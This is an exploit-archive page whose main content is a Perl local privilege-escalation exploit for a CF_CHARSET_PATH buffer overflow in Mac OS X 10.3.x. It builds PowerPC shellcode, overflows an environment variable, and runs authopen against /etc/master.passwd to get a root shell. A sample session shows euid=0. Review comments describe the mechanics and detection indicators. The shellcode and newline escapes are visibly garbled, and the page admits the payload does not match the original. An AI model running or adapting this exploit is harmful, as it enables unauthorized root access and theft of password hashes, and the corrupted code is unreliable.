
# Title : Mac OS X <= 10.3.8 (CF_CHARSET_PATH) Local BOF Exploit (2)
# Published : 2006-08-02
# Author : Kevin Finisterre
# Previous Title : Solaris 8 / 9 (/usr/ucb/ps) Local Information Leak Exploit
# Next Title : Mac OS X <= 10.4.7 fetchmail Privilege Escalation Exploit (x86)


#!/usr/bin/perl
#
# http://www.digitalmunition.com
# written by kf (kf_lists[at]digitalmunition[dot]com)
#
# Variant of CF_CHARSET_PATH a local root exploit by v9_at_fakehalo.us
#
# I was in the mood for some retro shit this morning, and I need root on some old ass G3 iMacs for a demo.
#
# I got sick of pressing enter on v9's exploit. It gets in the way when scripting attacks.
#
# Jill-Does-Computer:/tmp jilldoe$ ./authopen-CF_CHARSET.pl 0
# *** Target: 10.3.7 Build 7T65 on PowerPC, Padding: 1
# sh-2.05b# id
# uid=502(jilldoe) euid=0(root) gid=502(jilldoe) groups=502(jilldoe), 79(appserverusr), 80(admin), 81(appserveradm)
#
#

# Scrub the inherited environment so the helper launched at the bottom of
# the script sees only the two variables this script sets explicitly
# (CF_CHARSET_PATH and APPL).
foreach $key (keys %ENV) {

   delete $ENV{$key};

}

#// ppc execve() code by b-r00t + nemo to add seteuid(0)
# Payload string: a plain concatenation of string-literal fragments that is
# appended to the APPL variable below.  NOTE(review): the fragments as
# reproduced on this page are ordinary text and do not match what the
# author's comment above describes; treat this listing as a record of the
# technique, not as a faithful copy of the original literal.
$sc =
"x7cx63x1ax79" .
"x40x82xffxfd" .
"x39x40x01xc3" .
"x38x0axfexf4" .
"x44xffxffx02" .
"x39x40x01x23" .
"x38x0axfexf4" .
"x44xffxffx02" .
"x60x60x60x60" .
"x7cxa5x2ax79" .
"x40x82xffxfd" .
"x7dx68x02xa6" .
"x3bxebx01x70" .
"x39x40x01x70x39x1fxfexcf" .
"x7cxa8x29xaex38x7fxfexc8" .
"x90x61xffxf8x90xa1xffxfc" .
"x38x81xffxf8x38x0axfexcb" .
"x44xffxffx02x7cxa3x2bx78" .
"x38x0axfex91x44xffxffx02" .
"x2fx62x69x6ex2fx73x68x58";

# Target table, one entry per index: "<description>:<padding count>".
# The numeric field after ':' becomes $b below and sizes the APPL padding.
$tgts{"0"} = "10.3.7 Build 7T65 on PowerPC:1";
$tgts{"1"} = "10.3.7 debug 0x41424344:0";

# A single positional argument selects a %tgts entry.  With no argument,
# list the known targets and exit non-zero.  $a and $b are Perl's sort
# comparator globals; using them as scratch variables here only works
# because sort() is called with its default comparison and no block.
# (The usage literals are printed exactly as written here.)
unless (($target) = @ARGV) {

       print "nnUsage: $0 <target> nnTargets:nn";

       foreach $key (sort(keys %tgts)) {
               ($a,$b) = split(/:/,$tgts{"$key"});
               print "t$key . $an";
       }

       print "n";
       exit 1;
}

# NOTE(review): $retval is never assigned anywhere in this script and $ret
# is never read afterwards, so this packs undef (0) into a value that is
# then discarded.  Dead code; it would not compile under `use strict`.
$ret = pack("l", ($retval));
# Resolve the chosen target.  There is no check that $target is a valid
# key: an unknown index yields undef, leaving $a and $b empty with only a
# warning.  As written, "$bn" interpolates a variable named bn, not $b, so
# the padding value is not actually shown in this line.
($a,$b) = split(/:/,$tgts{"$target"});
print "*** Target: $a, Padding: $bn";

# add a wrapper here if you want more than euid=0
# Writes a fixed command line to a predictable path under /tmp, using a
# bareword handle and two-arg open with no error check; the handle is never
# closed explicitly.  Creation of this file is an observable artefact of
# the tool for anyone inspecting a host after the fact.
open(SUSH,">/tmp/sh");
printf SUSH "/bin/csh -in";

# Overflow vector (the title describes this as a local buffer overflow):
# CF_CHARSET_PATH is 1048 filler bytes followed by two copies of a native
# 32-bit packed value.  `x` binds tighter than `.`, so the repeat applies
# to pack()'s result only.  An environment variable of this length reaching
# the helper below is the indicator a detection rule would key on.
$ENV{"CF_CHARSET_PATH"} = "A" x 1048 . pack('l', 0xbffffef6) x 2;

# Payload carrier: $b dots of target-specific padding, 160 bytes of "i"
# (4 x 40), then $sc.  Because %ENV was cleared above, CF_CHARSET_PATH and
# APPL are the only variables the helper inherits.
$ENV{"APPL"} = "." x $b . "iiii" x 40 . $sc ;

# Launch the helper with a fixed argument string; no user input is
# interpolated into the command.  Per the author's sample session this is
# what yields euid=0, which implies the helper runs privileged (not
# verifiable from this file).  The environment assembled above is the
# entire attack surface handed to it.
system("/usr/libexec/authopen /etc/master.passwd");
